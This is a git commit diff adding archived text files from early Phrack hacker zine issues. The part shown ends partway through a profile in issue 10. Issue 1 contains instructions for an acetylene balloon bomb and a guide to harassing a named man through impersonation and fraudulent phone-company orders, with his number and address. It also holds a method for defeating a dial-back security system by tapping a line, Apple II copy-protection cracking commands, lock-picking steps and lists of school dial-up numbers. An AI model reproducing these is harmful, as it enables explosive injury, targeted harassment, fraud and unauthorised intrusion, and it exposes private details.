feat: init
This commit is contained in:
commit
40c0234a43
990 changed files with 831092 additions and 0 deletions
48
phrack1/1.txt
Normal file
48
phrack1/1.txt
Normal file
|
@ -0,0 +1,48 @@
|
|||
_ _ _______
|
||||
| \/ | / _____/
|
||||
|_||_|etal/ /hop
|
||||
_________/ /
|
||||
/__________/
|
||||
(314)432-0756
|
||||
24 Hours A Day, 300/1200 Baud
|
||||
|
||||
Presents....
|
||||
|
||||
==Phrack Inc.==
|
||||
Volume One, Issue One, Phile 1 of 8
|
||||
|
||||
Introduction...
|
||||
|
||||
Welcome to the Phrack Inc. Philes. Basically, we are a group of phile writers
|
||||
who have combined our philes and are distributing them in a group. This
|
||||
newsletter-type project is home-based at Metal Shop. If you or your group are
|
||||
interested in writing philes for Phrack Inc. you, your group, your BBS, or any
|
||||
other credits will be included. These philes may include articles on telcom
|
||||
(phreaking/hacking), anarchy (guns and death & destruction) or kracking. Other
|
||||
topics will be allowed also to an certain extent. If you feel you have some
|
||||
material that's original, please call and we'll include it in the next issue
|
||||
possible. Also, you are welcomed to put up these philes on your BBS/AE/Catfur/
|
||||
Etc. The philes will be regularly available on Metal Shop. If you wish to say
|
||||
in the philes that your BBS will also be sponsering Phrack Inc., please leave
|
||||
feedback to me, Taran King stating you'd like your BBS in the credits. Later
|
||||
on.
|
||||
|
||||
TARAN KING
|
||||
2600 CLUB!
|
||||
METAL SHOP SYSOP
|
||||
|
||||
|
||||
This issue is Volume One, Issue One, released on November 17, 1985. Included
|
||||
are:
|
||||
1 This Introduction to Phrack Inc. by Taran King
|
||||
2 SAM Security Article by Spitfire Hacker
|
||||
3 Boot Tracing on Apple by Cheap Shades
|
||||
4 The Fone Phreak's Revenge by Iron Soldier
|
||||
5 MCI International Cards by Knight Lightning
|
||||
6 How to Pick Master Locks by Gin Fizz and Ninja NYC
|
||||
7 How to Make an Acetylene Bomb by The Clashmaster
|
||||
8 School/College Computer Dial-Ups by Phantom Phreaker
|
||||
|
||||
Call Metal Shop and leave feedback saying the phile topic and where you got
|
||||
these philes to get your article in Phrack Inc.
|
||||
|
49
phrack1/2.txt
Normal file
49
phrack1/2.txt
Normal file
|
@ -0,0 +1,49 @@
|
|||
_ _ _______
|
||||
| \/ | / _____/
|
||||
|_||_|etal/ /hop
|
||||
_________/ /
|
||||
/__________/
|
||||
(314)432-0756
|
||||
24 Hours A Day, 300/1200 Baud
|
||||
|
||||
Presents...
|
||||
|
||||
==Phrack Inc.==
|
||||
Volume One, Issue One, Phile 2 of 8
|
||||
|
||||
::>Hacking SAM - A Description Of The Dial-Up Security System<::
|
||||
::>Written by Spitfire Hacker<::
|
||||
|
||||
SAM is a security system that is being used in many colleges
|
||||
today as a security feature against intrusion from the outside. This
|
||||
system utilizes a dial-back routine which is very effective. To
|
||||
access the computer, you must first dial the port to which SAM is
|
||||
hooked up. The port for one such college is located at (818) 885-
|
||||
2082. After you have called, SAM will answer the phone, but will make
|
||||
no other responses (no carrier signals). At this point, you must
|
||||
punch in a valid Login Identification Number on a push-button phone.
|
||||
The number is in this format -- xxyyyy -- where xx is, for the number
|
||||
mentioned above, 70. 'yyyy' is the last 4 digits of the valid user's
|
||||
telephone number.
|
||||
If a valid LIN is entered, SAM will give one of 3 responses:
|
||||
1) A 1 second low tone
|
||||
2) A 1 second alternating high/low tone
|
||||
3) A tone burst
|
||||
|
||||
Responses 1 and 2 indicate that SAM has accepted your passcode and is
|
||||
waiting for you to hang up. After you hang up, it will dial the valid
|
||||
users phone number and wait for a second signal.
|
||||
|
||||
Response 3 indicates that all of the outgoing lines are busy.
|
||||
|
||||
If SAM accepts your passcode, you will have to tap into the valid
|
||||
users line and intercept SAM when it calls. If you do this, then hit
|
||||
the '*' key on your phone. SAM will respond with a standard carrier,
|
||||
and you are in!
|
||||
|
||||
That's all that I have hacked out so far, I will write more
|
||||
information on the subject later.
|
||||
|
||||
-%>Spitfire Hacker<%-
|
||||
2600 Club!
|
||||
|
152
phrack1/3.txt
Normal file
152
phrack1/3.txt
Normal file
|
@ -0,0 +1,152 @@
|
|||
==Phrack Inc.==
|
||||
Volume One, Issue One, Phile 3 of 8
|
||||
|
||||
//////////////////////////////////////////////////////////////////////////////
|
||||
/ /
|
||||
/ Boot Tracing Made Easy /
|
||||
/ Written by /
|
||||
/ ________________ /
|
||||
/ \Cheap/ \Shades/ /
|
||||
/ \___/ \____/ /
|
||||
/ 2600 CLUB! /
|
||||
/ /
|
||||
//////////////////////////////////////////////////////////////////////////////
|
||||
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
||||
\ \
|
||||
\ Be sure to call \
|
||||
\ \
|
||||
\ Kleptic Palice......(314)527-5551 \
|
||||
\ 5 Meg BBS/AE/CF \
|
||||
\ Metal Shop..........(314)432-0756 \
|
||||
\ Elite BBS (Home of 2600 CLUB! \
|
||||
\ and Phrack Inc. ) \
|
||||
\ \
|
||||
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
||||
|
||||
About 3 or four years ago, a real good friend of mine was teaching a ML
|
||||
Programming course for the Apple 2 series. I, being a good friend and
|
||||
quite bored, asked him about cracking Apple games. He told me that he had
|
||||
spent the last summer cracking programs. He showed me a method that he came
|
||||
up with entirely on his own, boot tracing. Little did he know that this was
|
||||
already quite popular but he developed his own method for doing it which from
|
||||
reading other files about it, is the simplest I've ever seen. (To give you
|
||||
an idea, I had SN0GGLE (I've never played the game but a friend had it on
|
||||
disk.) completely loaded into memory ready to be dumped in about 12 minutes.)
|
||||
Ok, first of all, ALL programs can be boot traced. The only thing is that some
|
||||
may not be easily converted into files. The only programs that you should try
|
||||
if you aren't real good at ML, are ones that load completely into memory. Also
|
||||
to do this you will need a cassette recorder. (don't worry the program we will
|
||||
save won't take too long to save, and if all goes well it will only be saved
|
||||
loaded once.) I hate learning the theory behind anything so I'm not gonna
|
||||
give any theory behind this. If you want the theory, read some other phile
|
||||
that does this the hard way.
|
||||
|
||||
First make sure your cassette recoder works by BLOADing some program and
|
||||
typing:
|
||||
CALL -151
|
||||
AA60.AA73
|
||||
You'll see something that looks like this:
|
||||
AA60-30 02 xx xx xx xx xx xx
|
||||
AA68-xx xx xx xx xx xx xx xx
|
||||
AA70-xx xx 00 08
|
||||
or whatever...The 30 02 is the length ($0230 bytes). The 00 08 is the starting
|
||||
address ($0800). Oh well, now you need to try and save the program. Type:
|
||||
800.A2FW (A2F=$800+$230-1)
|
||||
1000<800.A2FM
|
||||
800:00 N 801<800.A2FM
|
||||
800.A2FR
|
||||
1000<800.A2FV
|
||||
|
||||
Once you are sure that the cassette works, (by the way do be stupid and try
|
||||
that on a //c!) we can get to the good stuff...
|
||||
First move the ROM boot-up code into RAM...(all steps will be from the
|
||||
monitor * prompt.)
|
||||
8600<C600.C6FFM
|
||||
86F9:5C FF
|
||||
(Now load in step 1 of the boot.)
|
||||
8600G
|
||||
C0E8 (turn the drive off)
|
||||
(Now you have successfully loaded in track 0 sector 0) Now since we won't want
|
||||
to overwrite what we've loaded in this time, Type:
|
||||
8500<800.8FFM
|
||||
86F9:01 85
|
||||
8501L
|
||||
Lets see what you've gotten...
|
||||
First see if they move this part into the keyboard buffer. (A lot of programs
|
||||
do this and the boot trace files that I've read don't even deal with this.)
|
||||
LDX 00
|
||||
LDA 800,X
|
||||
STA 200,X
|
||||
INX
|
||||
BNE $803
|
||||
JMP $211 (or any $2xx)
|
||||
(sometimes done with Y's instead of X's.)
|
||||
Then the next part will scramble what's in $08xx. but we don't have to worry
|
||||
about that. Anyways find that JMP $2xx and change it to 4C xx 85 leaving the
|
||||
xx the same. Usually this will be the next address but just to be safe...
|
||||
Ok, now scan the code for any other JMP's if you find one that's direct
|
||||
(indirect ones have the address in parenthesis) change it to 4C 5C FF, but
|
||||
write down the location that it used to jump to first so you know where to
|
||||
look. It'll probably be 301 or B700. If it's the B700, you got lucky. If it's
|
||||
the 301 then you've got some more work ahead. If it was an indirect JMP, most
|
||||
likely it was JMP ($003E). No if you change that to 4C 5C FF then check 3E
|
||||
from monitor you'll find that 3E is 00 and 3F is 3E...Monitor uses that
|
||||
place in zero page for its current memory location. So what you need to do is
|
||||
8400:A5 3F 00 20 DA FD A5 3E 20 DA FD 4C 5C FF
|
||||
then change that indirect jump to
|
||||
85xx:4C 00 84
|
||||
(by the way if the indirect jump is anything other than 3E then most likely
|
||||
you can can just look at it from monitor if not write a little routine like
|
||||
the one above to print out the address hidden. (Oh, check the location after
|
||||
the next run. For now change it to 4C 5C FF.))
|
||||
Anyways this little game will probably go on no longer than 2 or 3 loads, each
|
||||
time just move the newly loaded part to another part of memory and change the
|
||||
jump to jump to monitor (4C 5C FF) and the jump from the part before it to
|
||||
go to the moved code.
|
||||
When you find the part that JMP's up to a high area of memory (usually $B700)
|
||||
you're almost done. The exit routine of the will most likely be the start of
|
||||
the program. Once you intercept it there, all you have to do now is save it to
|
||||
cassette and re-load DOS. The starting address for saving should be the
|
||||
address that the B700 routine exits through. If this is higher than $6000 then
|
||||
start saving at $2000 to get the Hi-Res pictures. Using WXYZ as your starting
|
||||
address type:
|
||||
WXYZ.9CFFW (This will have the main program.)
|
||||
800.WXYZW (Save this are in case there is something needed down here we
|
||||
don't have to start over from scratch.)
|
||||
Ok now reboot:
|
||||
C600G (with a DOS disk in the drive!)
|
||||
CALL -151
|
||||
WXYZ.9CFFR
|
||||
Bsave PROGRAM,A$WXYZ,L$(Whatever 9CFF-WXYZ+1 is)
|
||||
If the it gives you an error the file is too big. A quick DOS patch to fix
|
||||
that is:
|
||||
A964:FF
|
||||
and try again.
|
||||
Now that the program is saved, try and run it. (It's a good idea to take the
|
||||
disk out of the drive, there's no telling what the program might try and do
|
||||
if it sees that DOS is loaded in.)
|
||||
WXYZG
|
||||
(If it works, just to make sure that it's a good crack, power down the system
|
||||
and try and BRUN it after a cold boot.)
|
||||
If your saved the pictures with the program, most likely, it won't run. You
|
||||
need to add a JMP at 1FFD to JMP to the main program. Then re-BSAVE it with a
|
||||
starting address of A$1FFD, and add 3 to the length. If the program tries to
|
||||
go to the drive while its running, I'd suggest giving up unless you really
|
||||
understand non-DOS disk usage. (but if you did you probably wouldn't be
|
||||
reading this.) If you get a break at an address less than $2000 then you need
|
||||
to load in the second program that you saved to cassette. Put a jump in at
|
||||
$800 to the main program and save the whole damn thing. If it still don't work
|
||||
you're gonna need to really get fancy.
|
||||
Now that you've got the thing running, it's time to figure out what is used and
|
||||
what is just wasted memory. This is where I really can't help you but just
|
||||
make sure that you keep a working copy and before every test power down the
|
||||
machine to clear anything that might be remaining.
|
||||
|
||||
Have phun and good luck.....
|
||||
________________
|
||||
\Cheap/ \Shades/
|
||||
\___/ \____/
|
||||
2600 CLUB!
|
||||
|
||||
Be sure and get a copy of PHRACK INC., available on finer BBS/AE's everywhere.
|
||||
|
97
phrack1/4.txt
Normal file
97
phrack1/4.txt
Normal file
|
@ -0,0 +1,97 @@
|
|||
_ _ _______
|
||||
| \/ | / _____/
|
||||
|_||_|etal/ /hop
|
||||
_________/ /
|
||||
/__________/
|
||||
(314)432-0756
|
||||
24 Hours A Day, 300/1200 Baud
|
||||
|
||||
Presents...
|
||||
|
||||
==Phrack Inc.==
|
||||
|
||||
Volume One, Issue One, Phile 4 of 8
|
||||
|
||||
THE PHONE PHREAK'S FRY-UM GUIDE
|
||||
|
||||
|
||||
COMPILED BY THE IRON SOLDIER
|
||||
|
||||
WITH HELP FROM DR. DOVE
|
||||
|
||||
|
||||
NOTE: THIS GUIDE IS STILL BEING COMPILED, AND AS PHONE PHREAKS LEARN
|
||||
MORE IN THE ART OF VENGENCE IT WILL ALWAYS EXPAND.
|
||||
|
||||
|
||||
"Vengence is mine", says the Phreak.
|
||||
|
||||
|
||||
METHOD 1-PHONE LINE PHUN
|
||||
|
||||
Call up the business office. It should be listed at the front of the white
|
||||
pages. Say you wanted to diconnect Scott Korman's line. DIAL 800-xxx-xxxx.
|
||||
"Hello, this is Mr. Korman, I'm moving to California and would like to have
|
||||
my phone service disconnected. I'm at the airport now. I'm calling from a
|
||||
payphone, my number is [414] 445 5005. You can send my final bill to
|
||||
:(somewhere in California. Thank you."
|
||||
|
||||
|
||||
METHOD 2-PHONE BOOKS
|
||||
|
||||
Call up the business office from a pay phone. Say "Hello, I'd like to order a
|
||||
Phone Book for Upper Volta (or any out-of-the way area with Direct
|
||||
Dialing). This is Scott Korman, ship to 3119 N. 44th St. Milwaukee, WI
|
||||
53216. Yes, I under stand it will cost $xx($25-$75!!). Thank you."
|
||||
|
||||
|
||||
METHOD 3-PHONE CALLS
|
||||
|
||||
Call up a PBX, enter the code and get an outside line. Then dial 0+ the number
|
||||
desired to call. You will hear a bonk and then an operator. Say, "I'd
|
||||
like to charge this to my home phone at 414-445-5005. Thank you." A friend
|
||||
and I did this to a loser, I called him at 1:00 AM and we left the fone off
|
||||
the hook all night. I calculated that it cost him $168.
|
||||
|
||||
|
||||
METHOD 4-MISC SERVICES
|
||||
|
||||
Call up the business office once again from a payfone. Say you'd like call
|
||||
waiting, forwarding, 3 way, etc. Once again you are the famed loser Scott
|
||||
Korman. He pays-you laugh. You don't know how funny it was talking to
|
||||
him, and wondering what those clicks he kept hearing were.
|
||||
|
||||
|
||||
METHOD 5-CHANGED & UNPUB
|
||||
|
||||
Do the same as in 4, but say you'd like to change and unlist your (Scott's)
|
||||
number. Anyone calling him will get:
|
||||
"BEW BEW BEEP. The number you have reached, 445-5005, has been changed to
|
||||
a non-published number. No further....."
|
||||
|
||||
|
||||
METHOD 6-FORWRDING
|
||||
|
||||
This required an accomplise or two or three. Around Christmas time, go to
|
||||
Toys 'R' Us. Get everyone at the customer service or manager's desk away
|
||||
("Hey, could you help me"). then you get on their phone and dial (usually
|
||||
dial 9 first) and the business office again. This time, say you are from
|
||||
Toys 'R' Us, and you'd like to add call forwarding to 445-5005. Scott will
|
||||
get 100-600 calls a day!!!
|
||||
|
||||
|
||||
METHOD 7-RUSSIAN CALLER
|
||||
|
||||
Call a payphone at 10:00 PM. Say to the operator that you'd like to book a
|
||||
call to Russia. Say you are calling from a payphone, and your number is
|
||||
that of the loser to fry (e.g. 445-5005). She will say that she'll have to
|
||||
call ya back in 5 hours, and you ok that. Meanwhile the loser (e.g.)
|
||||
Scott, will get a call at 3:00 AM from an operator saying that the call he
|
||||
booked to Russia is ready.
|
||||
|
||||
|
||||
|
||||
IF YOU HAVE ANY QUESTIONS LEAVE E-MAIL FOR ME ON ANY BOARD I'M ON.
|
||||
The Iron Soldier
|
||||
TSF-The Second Foundation!
|
||||
|
70
phrack1/5.txt
Normal file
70
phrack1/5.txt
Normal file
|
@ -0,0 +1,70 @@
|
|||
_ _ _______
|
||||
| \/ | / _____/
|
||||
|_||_|etal/ /hop
|
||||
_________/ /
|
||||
/__________/
|
||||
(314)432-0756
|
||||
24 Hours A Day, 300/1200 Baud
|
||||
|
||||
Presents...
|
||||
|
||||
==Phrack Inc.==
|
||||
Volume One, Issue One, Phile 5 of 8
|
||||
|
||||
Using MCI Calling Cards
|
||||
by
|
||||
Knight Lightning
|
||||
of the
|
||||
2600 Club!
|
||||
|
||||
How to dial international calls on MCI:
|
||||
|
||||
"Its easy to use MCI for international calling."
|
||||
|
||||
1. Dial your MCI access number and authorization code (code = 14 digit number,
|
||||
however the first 10 digits are the card holders NPA+PRE+SUFF).
|
||||
|
||||
2. Dial 011
|
||||
|
||||
3. Dial the country code
|
||||
|
||||
4. Dial the city code and the PRE+SUFF that you want.
|
||||
|
||||
Countries served by MCI:
|
||||
|
||||
Country code|Country code
|
||||
---------------------------------------|---------------------------------------
|
||||
Algeria............................213 |New Zealand........................64
|
||||
Argentina..........................54 |Northern Ireland...................44
|
||||
Australia..........................61 |Oman...............................968
|
||||
Belgium............................32 |Papua New Guinea...................675
|
||||
Brazil.............................55 |Qatar..............................974
|
||||
Canada..................Use Area Codes |Saudi Arabia.......................966
|
||||
Cyprus.............................357 |Scotland...........................44
|
||||
Denmark............................45 |Senegal............................221
|
||||
Egypt..............................20 |South Africa.......................27
|
||||
England............................44 |Sri Lanka..........................94
|
||||
German Democratic Republic |Sweden.............................46
|
||||
(East Germany).....................37 |Taiwan.............................886
|
||||
Greece.............................30 |Tanzania...........................255
|
||||
Jordan.............................962 |Tunisa.............................216
|
||||
Kenya..............................254 |United Arab Emirates...............971
|
||||
Kuwait.............................965 |Wales..............................44
|
||||
Malawi.............................265 |
|
||||
===============================================================================
|
||||
Thats 33 countries in all. To get the extender for these calls dial 950-1022
|
||||
or 1-800-624-1022.
|
||||
|
||||
For local calling:
|
||||
|
||||
1. Dial 950-1022 or 1-800-624-1022
|
||||
|
||||
2. Wait for tone
|
||||
|
||||
3. Dial "0", the area code, the phone number, and the 14 digit authorization
|
||||
code. You will hear 2 more tones that let you know you are connected.
|
||||
|
||||
- Knight Lightning --> The 2600 Club!
|
||||
===============================================================================
|
||||
|
||||
|
45
phrack1/6.txt
Normal file
45
phrack1/6.txt
Normal file
|
@ -0,0 +1,45 @@
|
|||
_ _ _______
|
||||
| \/ | / _____/
|
||||
|_||_|etal/ /hop
|
||||
_________/ /
|
||||
/__________/
|
||||
(314)432-0756
|
||||
24 Hours A Day, 300/1200 Baud
|
||||
|
||||
Presents...
|
||||
|
||||
==Phrack Inc.==
|
||||
Volume One, Issue One, Phile 6 of 8
|
||||
|
||||
How to Pick Master Locks
|
||||
By Gin Fizz & Ninja NYC
|
||||
|
||||
Have you ever tried to impress your friends by picking one of those Master
|
||||
combination locks and failed? Well then read on. The Master lock company has
|
||||
made this kind of lock with a protection scheme. If you pull the handle of it
|
||||
hard, the knob won't turn. That was their biggest mistake...... Ok, now on to
|
||||
it.
|
||||
|
||||
1st number. Get out any of the Master locks so you know what's going on.
|
||||
1: The handle part (the part that springs open when you get the combination),
|
||||
pull on it, but not enough so that the knob won't move. 2: While pulling on it
|
||||
turn the knob to the left until it won't move any more. Then add 5 to this
|
||||
number. Congradulations, you now have the 1st number.
|
||||
|
||||
2nd number. (a lot tougher) Ok, spin the dial around a couple of times,
|
||||
then go to the 1st number you got, then turn it to the right, bypassing the 1st
|
||||
number once. WHEN you have bypassed. Start pulling the handle and turning it.
|
||||
It will eventually fall into the groove and lock. While in the groove pull on
|
||||
it and turn the knob. If it is loose go to the next groove; if it's stiff you
|
||||
got the second number.
|
||||
|
||||
3rd number: After getting the 2nd, spin the dial, then enter the 2 numbers,
|
||||
then after the 2nd, go to the right and at all the numbers pull on it. The lock
|
||||
will eventually open if you did it right. If can't do it the first time, be
|
||||
patient, it takes time.
|
||||
|
||||
Have phun...
|
||||
|
||||
Gin Fizz/2600 Club!/TPM
|
||||
Ninja NYC/TPM
|
||||
|
106
phrack1/7.txt
Normal file
106
phrack1/7.txt
Normal file
|
@ -0,0 +1,106 @@
|
|||
_ _ _______
|
||||
| \/ | / _____/
|
||||
|_||_|etal/ /hop
|
||||
_________/ /
|
||||
/__________/
|
||||
(314)432-0756
|
||||
24 Hours A Day, 300/1200 Baud
|
||||
|
||||
Presents...
|
||||
|
||||
==Phrack Inc.==
|
||||
Volume One, Issue One, Phile 7 of 8
|
||||
|
||||
.-------------------------------------------------------------.
|
||||
! /////// !
|
||||
! // !
|
||||
! // h e C l a s h m a s t e r ' s !
|
||||
! .===============================. !
|
||||
! < A C E T Y L E N E > !
|
||||
! < ->B A L L O O N<- > !
|
||||
! < ---->B O M B<---- > !
|
||||
! `===============================' !
|
||||
! Written exclusively for... !
|
||||
! The Phrack Inc. !
|
||||
! 2600 Club !
|
||||
! Newsletter 11/01/85!
|
||||
`-------------------------------------------------------------'
|
||||
|
||||
|
||||
Imagine this. A great, inflated, green garbage bag
|
||||
slowly wafting down from a tall building. It gains some speed
|
||||
as it nears the ground. People look up and say, "What the....?"
|
||||
The garbage bag hits! *BOOM!!!* It explodes in a thundering
|
||||
fireball of green bits of plastic and flame!
|
||||
"What is this?" you may ask. Well, this is the great
|
||||
"Acetylene Balloon Bomb." And here is how to make it.
|
||||
|
||||
Ingredients:
|
||||
============
|
||||
(1> For a small bomb: a plastic bag. Not too big.
|
||||
For something big(ger): a green, plastic garbage bag.
|
||||
|
||||
(2> Some "Fun-Snaps". A dozen should be more than enough.
|
||||
|
||||
(3> Some garbage bag twisties. String would also do.
|
||||
|
||||
(4> A few rocks. Not too heavy, but depends on size of
|
||||
bomb and desired velocity of balloon/bomb.
|
||||
|
||||
(5> PRIME INGREDIENT: Acetylene. This is what is used in
|
||||
acetylene torches. More on this substance later.
|
||||
|
||||
(6> One or more eager Anarchists.
|
||||
|
||||
NOTES:
|
||||
======
|
||||
Acetylene is a fairly dangerous substance. It is unstable upon
|
||||
contact with oxygen (air). For this reason, and for your
|
||||
safety, I recommend you keep all of the acetylene AWAY from any
|
||||
source of oxygen. This means don't let it get in touch with
|
||||
air.
|
||||
|
||||
|
||||
Construction:
|
||||
=============
|
||||
(1> Fill up a bathtub with cold water. Make it VERY full.
|
||||
(2> Now get put you garbage bag in the water and fill it
|
||||
with water. Make sure ALL air/oxygen is out of the
|
||||
bag before proceeding.
|
||||
(3> Now take your acetylene source (I used it straight
|
||||
from the torch, and I recommend this way also.), and
|
||||
fill the bag up with acetylene.
|
||||
(4> Now, being careful with the acetylene, take the bag
|
||||
out of the tub and tie the opening shut with the
|
||||
twisty or string. Let the balloon dry off now. (Put
|
||||
it in a safe place.)
|
||||
(5> Okay. Now that it is dry and filled with acetlene,
|
||||
open it up and drop a few rocks in there. Also add
|
||||
some Fun-Snaps. The rocks will carry the balloon
|
||||
down, and the Fun-Snaps will spark upon impact, thus
|
||||
setting off the highly inflammable acetylene.
|
||||
*BABOOM!*
|
||||
(6> Now put the twisty or string back on VERY tightly.
|
||||
You now have a delicate but powerful balloon bomb.
|
||||
|
||||
To use:
|
||||
=======
|
||||
Just drop off of a cliff, airplane, building, or whatever. It
|
||||
will hit the ground a explode in a fireball. Be careful you are
|
||||
not near the explosion site. And be careful you are not
|
||||
directly above the blast or the fireball may rise and give you
|
||||
a few nasty burns.
|
||||
|
||||
Have fun!
|
||||
But be careful...
|
||||
|
||||
NOTE: I, The Clashmaster, am in NO WAY responsible for the use
|
||||
===== of this information in any way. This is for purely
|
||||
informational purposes only!
|
||||
|
||||
|
||||
This has been a 2600 Club production.
|
||||
|
||||
-=*Clash*=-
|
||||
2600 Club
|
||||
|
115
phrack1/8.txt
Normal file
115
phrack1/8.txt
Normal file
|
@ -0,0 +1,115 @@
|
|||
_ _ _______
|
||||
| \/ | / _____/
|
||||
|_||_|etal/ /hop
|
||||
_________/ /
|
||||
/__________/
|
||||
(314)432-0756
|
||||
24 Hours A Day, 300/1200 Baud
|
||||
|
||||
Presents...
|
||||
|
||||
==Phrack Inc.==
|
||||
Volume One, Issue One, Phile 8 of 8
|
||||
|
||||
|
||||
Schools and University Numbers
|
||||
``````````````````````````````
|
||||
Harvard University 617-732-1251
|
||||
Yale 203-436-2111
|
||||
District 214 312-398-8170
|
||||
Chicago Board of Education 312-254-1919
|
||||
Spence Schools 212-369-5114
|
||||
University of Texas 214-688-1400
|
||||
University of Missouri 314-341-2776
|
||||
314-341-2910
|
||||
(1200) 314-341-2141
|
||||
Cal-Tech 213-687-4662
|
||||
University of Nevada 402-472-5065
|
||||
Princeton University 609-452-6736
|
||||
Stony Brook University 516-246-9000
|
||||
Depaul 312-939-8388
|
||||
University of San Diego 619-452-6792
|
||||
RPI School 518-220-6603
|
||||
William State University 313-577-0260
|
||||
Harvard 617-732-1802
|
||||
Stockton 209-944-4523
|
||||
Northwestern 312-492-3094
|
||||
Circle Campus 312-996-5100
|
||||
312-996-6320
|
||||
University of Mexico 505-588-3351
|
||||
University of Florida 904-644-2261
|
||||
Queens College 212-520-7719
|
||||
University of Denver 303-753-2737
|
||||
303-753-2733
|
||||
University of Syracuse 315-423-1313
|
||||
University of Illinois 312-996-5100
|
||||
University of Virginia 703-328-8086
|
||||
MIT Research 1-800-545-0085
|
||||
St.Louis Community College 314-645-1289
|
||||
SIUE 618-692-2400
|
||||
618-692-2401
|
||||
618-692-2402
|
||||
618-692-2403
|
||||
618-692-2404
|
||||
618-692-2405
|
||||
618-692-2406
|
||||
618-692-2407
|
||||
618-692-2408
|
||||
Universiti------- 215-787-1011
|
||||
Willaim -------- 313-577-0260
|
||||
University of Florida 904-392-5533
|
||||
Col & Union College 301-279-0632
|
||||
Georgia State 404-568-2131
|
||||
University of Mass. 413-545-1600
|
||||
Purdue 317-494-1900
|
||||
Northwestern 312-492-7110
|
||||
University of New Mexico 505-227-3351
|
||||
University of Texas 214-688-1400
|
||||
Temple University 215-787-1010
|
||||
Melville High School 516-751-6806
|
||||
UCSD 619-452-6900
|
||||
Oakland Schools 313-857-9500
|
||||
University of Maryland 301-454-6111
|
||||
California St. Fulerton 714-773-3111
|
||||
N.Y.U. 212-777-7600
|
||||
University of San Diego 619-293-4510
|
||||
University of Colorado 303-447-2540
|
||||
University of Colorado 303-447-2538
|
||||
MIT Research 617-258-6001
|
||||
Dartmouth College 603-643-63q0
|
||||
Spence School 212-369-5114
|
||||
University of Washington 206-543-9713
|
||||
University of Washington 206-543-9714
|
||||
University of Washington 206-543-9715
|
||||
University of Washington 206-543-9716
|
||||
University of Washington 206-543-9717
|
||||
University of NC 919-549-0881
|
||||
Harvard-Law,Busi,Med Sch. 617-732-1251
|
||||
Virginia University 703-328-8086
|
||||
WVU 304-293-2921 thru 304-293-2939
|
||||
WVU 304-293-4300 thru 304-293-4309
|
||||
WVU(1200)304-293-4701 thru 304-293-4708
|
||||
WVU(1200)304-293-5591 thru 304-293-5594
|
||||
WVU(134.5 bps) 304-293-3601
|
||||
WVU(134.5 bps) 304-293-3602
|
||||
Lake Wash. School 206-828-3499
|
||||
University of San Diego 619-452-6792
|
||||
RPL School 518-220-6603
|
||||
Another School 212-369-5114
|
||||
Harvard 617-732-1251
|
||||
Harvard 617-732-1802
|
||||
William State University 313-577-0260
|
||||
Florida University 904-644-2261
|
||||
Wayne State 313-577-0260
|
||||
U of F 904-644-2261
|
||||
High School 513-644-3840
|
||||
```````````````````````````````````````
|
||||
File provided by the Alliance
|
||||
6 1 8 - 6 6 7 - 3 8 2 5
|
||||
7 p m - 7 a m
|
||||
|
||||
|
||||
|
||||
Uploaded by Phantom Phreaker
|
||||
|
||||
|
41
phrack10/1.txt
Normal file
41
phrack10/1.txt
Normal file
|
@ -0,0 +1,41 @@
|
|||
==Phrack Inc.==
|
||||
|
||||
Volume Two, Issue Ten, Phile #1 of 9
|
||||
|
||||
1/1/87
|
||||
|
||||
Introduction...
|
||||
~~~~~~~~~~~~~~~
|
||||
Well, we have made it to this, the start of a new year and the start
|
||||
of a new volume of Phrack Inc. This has taken quite a while to get the long
|
||||
awaited issue out, and it's been procrastinated quite a bit, so I apologize to
|
||||
those that have been patiently waiting. We have purposely waited a bit, but
|
||||
we also are releasing this Phrack approximately at the same time as the Legion
|
||||
of Doom/Hackers Technical Journal, which is another high quality newsletter
|
||||
working with us rather than against us, and I personally recommend the
|
||||
documents as highly informative. I really enjoyed it and hope you continue to
|
||||
support both of us.
|
||||
If you wish to write for Phrack Inc., merely get in touch with myself,
|
||||
Knight Lightning, Cheap Shades or Beer Wolf or anyone that knows us or is on
|
||||
any of the MSP boards and we shall either get back to you or get in contact
|
||||
with you in some manner. File topics can be either telecommunications or on
|
||||
operating systems or some unique aspect/flaw of security. Be looking forward
|
||||
to more Phrack issues in the near and far future. Later
|
||||
-TK
|
||||
|
||||
------------------------------------------------------------------------------
|
||||
|
||||
This issue of Phrack Inc. includes the following:
|
||||
|
||||
#1 Introduction to Phrack 10 by Taran King (2.2k)
|
||||
#2 Pro-Phile on Dave Starr by Taran King (7.5k)
|
||||
#3 The TMC Primer by Cap'n Crax (6.1k)
|
||||
#4 A Beginner's Guide to the IBM VM/370 by Elric of Imrryr (3.5k)
|
||||
#5 Circuit Switched Digital Capability by The Executioner (11.9k)
|
||||
#6 Hacking Primos Part I by Evil Jay (10.9k)
|
||||
#7 Automatic Number Identification by Phantom Phreaker and Doom Prophet
|
||||
(9.2k)
|
||||
#8 Phrack World News 9 Part I by Knight Lightning (22.7k)
|
||||
#9 Phrack World News 9 Part II by Knight Lightning (14.8k)
|
||||
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
142
phrack10/2.txt
Normal file
142
phrack10/2.txt
Normal file
|
@ -0,0 +1,142 @@
|
|||
==Phrack Inc.=
|
||||
|
||||
Volume Two, Issue 10, Phile #2 of 9
|
||||
|
||||
==Phrack Pro-Phile 7==
|
||||
|
||||
Written and Created by Taran King
|
||||
|
||||
12/15/86
|
||||
|
||||
Welcome to Phrack Pro-Phile 7. Phrack Pro-Phile is created to bring
|
||||
info to you, the users, about old or highly important/controversial people.
|
||||
This month, I bring to you a user from the golden years of hacking and
|
||||
phreaking...
|
||||
|
||||
Dave Starr
|
||||
~~~~ ~~~~~
|
||||
|
||||
Dave is one of the old phreakers and hackers that accomplished so
|
||||
much through voice phreaking and literal hacking rather than reading others'
|
||||
findings to learn. A master engineer, voice phreaking is one unto itself.
|
||||
Dave has a PhD in B.S.
|
||||
-------------------------------------------------------------------------------
|
||||
Personal
|
||||
~~~~~~~~
|
||||
Handle: Dave Starr
|
||||
Call him: Dave Starr
|
||||
Past handles: Micronet Phantom and Big Brother
|
||||
Handle origin: Micronet Phantom came from working with The Source
|
||||
computer and Big Brother, of course, came from George
|
||||
Orwell's 1984.
|
||||
Date of Birth: 5/6/62
|
||||
Age at current date: 24
|
||||
Height: 6' 0"
|
||||
Weight: 170 lbs.
|
||||
Eye color: Brown
|
||||
Hair Color: Light Brown
|
